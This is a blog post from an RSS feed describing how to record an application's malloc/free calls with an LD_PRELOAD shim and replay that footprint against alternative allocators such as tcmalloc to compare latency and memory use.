</p>
<p>The other day at Kickball Labs we were discussing whether linking Ruby against tcmalloc (or ptmalloc3, nedmalloc, or any other malloc) would have any noticeable effect on application latency. After taking a side in the argument, I started wondering how we could test this scenario.</p>
<p>We had a couple different ideas about testing:</p>
<ul>
<li><b>Look at other people&#8217;s benchmarks</b><br />BUT do the memory workloads tested in the benchmarks actually match our own workload at all?</li>
<li><b>Run different allocators on different Ruby backends</b><br />BUT different backends will get different users who will use the system differently and cause different allocation patterns</li>
<li><b>Try to recreate our applications memory footprint and test that against different mallocs</b><br />
BUT how?</li>
</ul>
<p>I decided to explore <strong>the last option</strong> and came up with an interesting solution. Let&#8217;s dive into how to do this.</p>
<h2>Get the code:</h2>
<p><a href="http://github.com/ice799/malloc_wrap/tree/master">http://github.com/ice799/malloc_wrap/tree/master</a><br />
</p>
<h2>Step 1: We need to get a memory footprint of our process</h2>
<p>So we have some random binary  (in this case it happens to be a Ruby interpreter, but it could be anything) and we&#8217;d like to track when it calls malloc/realloc/calloc and free (from now on I&#8217;ll refer to all of these as malloc-family for brevity). There are two ways to do this, the right way and the wrong/hacky/unsafe way.</p>
<ul>
<li>
<h3>The &#8220;right&#8221; way to do this, with libc malloc hooks:</h3>
<p>Edit your application code to use the malloc debugging hooks provided by libc. When a malloc-family function is called, your hook executes and outputs to a file which function was called and what arguments were passed to it.</li>
<li>
<h3>The &#8220;wrong/hacky/unsafe&#8221; way to do this, with LD_PRELOAD:</h3>
<p>Create a shim library and point LD_PRELOAD at it. The shim exports the malloc-family symbols, and when your application calls one of those functions, the shim code gets executed. The shim logs which function was called and with what arguments. The shim then calls the libc version of the function (so that memory is actually allocated/freed) and returns control to the application.</li>
</ul>
<p>I chose to do it <strong>the second way</strong>, because I like living on the edge. <strong>The second way is unsafe because you can&#8217;t call any functions which use a malloc-family function before your hooks are setup. If you do, you can end up in an infinite loop and crash the application.</strong></p>
<p>You can check out my implementation for the shim library here: <a href="http://github.com/ice799/malloc_wrap/blob/master/malloc_wrap.c">malloc_wrap.c</a></p>
<h3> Why does your shim output such weirdly formatted data?</h3>
<p>Answer is sort of complicated, but let&#8217;s keep it simple: I originally had a different idea about how I was going to use the output. When that first try failed, I tried something else and translated the data to the format I needed it in, instead of re-writing the shim. What can I say, I&#8217;m a lazy programmer.</p>
<p>OK, so once you&#8217;ve built the shim (<b>gcc -O2 -Wall -ldl -fPIC -o malloc_wrap.so -shared malloc_wrap.c</b>), you can launch your binary like this:</p>
<div class="dean_ch" style="white-space: wrap;">% <span class="re2">LD_PRELOAD=</span>/path/to/shim/malloc_wrap.so /path/to/your/binary -your -args</div>
<p>You should now see output in /tmp/malloc-footprint.pid</p>
<h2>Step 2: Translate the data into a more usable format</h2>
<p>Yeah, I should have went back and re-written the shim, but nothing happens exactly as planned. So, I wrote a quick ruby script to convert my output into a more usable format. The script sorts through the output and renames memory addresses to unique integer ids starting at 1 (0 is hardcoded to NULL).</p>
<p>The format is pretty simple. The first line of the file has the number of calls to malloc-family functions, followed by a blank line, and then the memory footprint. Each line of the memory footprint has 1 character which represents the function called followed by a few arguments. For the free() function, there is only one argument, the ID of the memory block to free. malloc/calloc/realloc have different arguments, but the first argument following the one character is always the ID of the return value. The next arguments are the arguments usually passed to malloc/calloc/realloc in the same order.</p>
<p>Have a look at my ruby script here: <a href="http://github.com/ice799/malloc_wrap/blob/master/build_trace_file.rb">build_trace_file.rb</a></p>
<p>It might take a while to convert your data to this format, I suggest running this in a <a href="http://www.gnu.org/software/screen/"> screen</a> session, especially if your memory footprint data is large. Just as a warning, we collected 15 *gigabytes* of data over a 10 hour period. This script took *10 hours* to convert the data. We ended up with a 7.8 gigabyte file.</p>
<div class="dean_ch" style="white-space: wrap;">% ruby /path/to/script/build_trace_file.rb /path/to/raw/malloc-footprint.PID /path/to/converted/my-memory-footprint</div>
<h2>Step 3: Replay the allocation data with different allocators and measure time, memory usage.</h2>
<p>OK, so we now have a file which represents the memory footprint of our application. It&#8217;s time to build the replayer, link against your malloc implementation of choice, fire it up and start measuring time spent in allocator functions and memory usage.</p>
<p>Have a look at the replayer here: <a href="http://github.com/ice799/malloc_wrap/blob/master/alloc_tester.c">alloc_tester.c</a><br />
Build the replayer: <b>gcc -ggdb -Wall -ldl -fPIC -o tester alloc_tester.c</b></p>
<h3>Use ltrace</h3>
<p>ltrace is similar to <a href="http://timetobleed.com/hello-world/">strace</a>, but for library calls. You can use ltrace -c to sum the amount of time spent in different library calls and output a cool table at the end, it will look something like this:</p>
<pre>
% time     seconds  usecs/call     calls      function
------ ----------- ----------- --------- --------------------
86.70   37.305797          62    600003 fscanf
10.64    4.578968          33    138532 malloc
2.36    1.014294          18     55263 free
0.25    0.109550          18      5948 realloc
0.03    0.011407          45       253 printf
0.02    0.010665          42       252 puts
0.00    0.000167          20         8 calloc
0.00    0.000048          48         1 fopen
------ ----------- ----------- --------- --------------------
100.00   43.030896                800260 total</pre>
<h2>Conclusion</h2>
<p>Using a different malloc implementation can provide a speed/memory increases depending on your allocation patterns. Hopefully the code provided will help you test different allocators to determine whether or not swapping out the default libc allocator is the right choice for you. Our results are still pending; we had a lot of allocator data (15g!) and it takes several hours to replay the data with just one malloc implementation. Once we&#8217;ve gathered some data about the different implementations and their effects, I&#8217;ll post the results and some analysis. As always, stay tuned and thanks for reading!</p>
]]></content:encoded>
			<wfw:commentRss>http://timetobleed.com/ab-test-mallocs-against-your-memory-footprint/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>

